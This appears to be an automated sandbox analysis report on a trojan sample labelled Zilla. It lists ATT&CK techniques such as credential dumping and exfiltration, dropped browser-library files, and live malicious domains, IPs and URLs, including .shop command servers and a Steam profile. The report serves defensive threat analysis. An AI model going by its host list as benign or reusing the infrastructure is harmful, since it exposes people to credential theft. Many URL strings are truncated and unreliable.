Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	Boot or Logon Initialization Scripts	511 Process Injection	11 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	55 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	261 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	511 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\FIEHIIIJDA.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vdshfd[1].exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://player.vimeo.com	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://steam.tv/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://5.75.211.162/mozglue.dll9ap	100%	Avira URL Cloud	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://cowod.hopto.org	0%	Avira URL Cloud	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
https://5.75.211.162/msvcp140.dll7az	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	0%	Avira URL Cloud	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://5.75.211.162/ECGCAEBFI	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	Avira URL Cloud	safe
reinforcenh.shop	100%	Avira URL Cloud	malware
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://5.75.211.162/mozglue.dll	100%	Avira URL Cloud	malware
stogeneratmns.shop	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/;	0%	URL Reputation	safe
https://www.entrust.net/rpa0	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	Avira URL Cloud	safe
https://vozmeatillu.shop/apiR	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	Avira URL Cloud	safe
https://reinforcenh.shop/api	100%	Avira URL Cloud	malware
https://www.google.com	0%	Avira URL Cloud	safe
https://5.75.211.162/freebl3.dll	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869/badges	100%	Avira URL Cloud	malware
http://cowod.hopto.org_DEBUG.zip/c	0%	Avira URL Cloud	safe
https://www.youtube.com	0%	Avira URL Cloud	safe
http://cowod.CGCBKECAAAEB	0%	Avira URL Cloud	safe
https://5.75.211.162/ff	100%	Avira URL Cloud	malware
https://5.75.211.162/vcruntime140.dll	100%	Avira URL Cloud	malware
http://cowod.hopto.	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	0%	Avira URL Cloud	safe
http://cowod.hopto	0%	Avira URL Cloud	safe
https://5.75.211.162/mozglue.dll_a	100%	Avira URL Cloud	malware
https://ghostreedmnu.shop/apiES	100%	Avira URL Cloud	malware
ghostreedmnu.shop	100%	Avira URL Cloud	malware
https://5.75.211.162	100%	Avira URL Cloud	malware
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://5.75.211.162FBGHC	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869Zr	0%	Avira URL Cloud	safe
https://5.75.211.162/freebl3.dllia	100%	Avira URL Cloud	malware
https://store.steampowered.com/privac	0%	Avira URL Cloud	safe
https://steamcommunity.com/l	0%	Avira URL Cloud	safe
http://cowod.hopto.CAAAEB	0%	Avira URL Cloud	safe
https://5.75.211.162.exe	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	0%	Avira URL Cloud	safe
https://t.me/ae5ed	100%	Avira URL Cloud	malware
https://5.75.211.162IJKFB	0%	Avira URL Cloud	safe
https://store.steampowered.com/points/shop/	0%	Avira URL Cloud	safe
https://vozmeatillu.shop/api	100%	Avira URL Cloud	malware
https://5.75.211.162/msvcp140.dllAa	100%	Avira URL Cloud	malware
https://sketchfab.com	0%	Avira URL Cloud	safe
https://steamcommunity.com/X	0%	Avira URL Cloud	safe
https://www.youtube.com/	0%	Avira URL Cloud	safe
https://5.75.211.162/-	100%	Avira URL Cloud	malware
fragnantbui.shop	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	Avira URL Cloud	safe
https://offensivedzvju.shop/api	100%	Avira URL Cloud	malware
https://5.75.211.162/softokn3.dllga	100%	Avira URL Cloud	malware
drawzhotdog.shop	100%	Avira URL Cloud	malware
offensivedzvju.shop	100%	Avira URL Cloud	malware
https://www.google.com/recaptcha/	0%	Avira URL Cloud	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	Avira URL Cloud	safe
https://5.75.211.162/L	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	Avira URL Cloud	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	Avira URL Cloud	safe
https://5.75.211.162/sqlp.dllW1	100%	Avira URL Cloud	malware
http://cowod.hopto.orgAEB	0%	Avira URL Cloud	safe
vozmeatillu.shop	100%	Avira URL Cloud	malware
https://drawzhotdog.shop/api	100%	Avira URL Cloud	malware
https://steamcommunity.com/my/wishlist/	0%	Avira URL Cloud	safe
https://5.75.211.162/vcruntime140.dllmc	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fragnantbui.shop	188.114.96.3	true	true	unknown
gutterydhowi.shop	172.67.132.32	true	true	unknown
steamcommunity.com	104.102.49.254	true	true	unknown
cowod.hopto.org	45.132.206.251	true	true	unknown
offensivedzvju.shop	188.114.97.3	true	true	unknown
stogeneratmns.shop	188.114.97.3	true	true	unknown
reinforcenh.shop	172.67.208.139	true	true	unknown
drawzhotdog.shop	172.67.162.108	true	true	unknown
ghostreedmnu.shop	188.114.96.3	true	true	unknown
vozmeatillu.shop	188.114.96.3	true	true	unknown
dbsmena.com	172.105.54.160	true	false	unknown
ballotnwu.site	104.21.2.13	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
reinforcenh.shop	true	Avira URL Cloud: malware	unknown
stogeneratmns.shop	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/mozglue.dll	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/freebl3.dll	true	Avira URL Cloud: malware	unknown
https://reinforcenh.shop/api	true	Avira URL Cloud: malware	unknown
ghostreedmnu.shop	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://vozmeatillu.shop/api	true	Avira URL Cloud: malware	unknown
fragnantbui.shop	true	Avira URL Cloud: malware	unknown
https://offensivedzvju.shop/api	true	Avira URL Cloud: malware	unknown
offensivedzvju.shop	true	Avira URL Cloud: malware	unknown
drawzhotdog.shop	true	Avira URL Cloud: malware	unknown
vozmeatillu.shop	true	Avira URL Cloud: malware	unknown
https://drawzhotdog.shop/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	EGIDHD.4.dr	false	URL Reputation: safe	unknown
https://player.vimeo.com	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	EGIDHD.4.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/mozglue.dll9ap	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org	RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/msvcp140.dll7az	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	RegAsm.exe, 00000004.00000002.2770019694.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, AKEGII.4.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://5.75.211.162/ECGCAEBFI	RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://vozmeatillu.shop/apiR	RegAsm.exe, 0000000C.00000002.2802203193.000000000146E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869/badges	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: malware	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://www.youtube.com	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
http://cowod.CGCBKECAAAEB	RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/ff	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.	RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	file.exe, 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, FIEHIIIJDA.exe, 0000000D.00000002.2725250219.000000000391B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000437000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162	76561199780418869[1].htm.4.dr	false	Avira URL Cloud: malware	unknown
http://cowod.hopto	RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/mozglue.dll_a	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://ghostreedmnu.shop/apiES	RegAsm.exe, 0000000C.00000002.2801859666.000000000142A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://s.ytimg.com;	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162FBGHC	RegAsm.exe, 00000010.00000002.3151894747.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/privac	RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steam.tv/	RegAsm.exe, 0000000C.00000002.2801859666.000000000144E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869Zr	RegAsm.exe, 00000010.00000002.3154731112.0000000001071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/freebl3.dllia	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/l	RegAsm.exe, 0000000C.00000002.2802203193.0000000001457000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/ae5ed	file.exe, 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, FIEHIIIJDA.exe, 0000000D.00000002.2725250219.000000000391B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.0000000000437000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://cowod.hopto.CAAAEB	RegAsm.exe, 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	RegAsm.exe, RegAsm.exe, 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162.exe	RegAsm.exe, 00000010.00000002.3151894747.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3151894747.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.16.dr, 76561199780418869[1].htm.4.dr	false	URL Reputation: safe	unknown
https://mozilla.org0/	RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	false	URL Reputation: safe	unknown
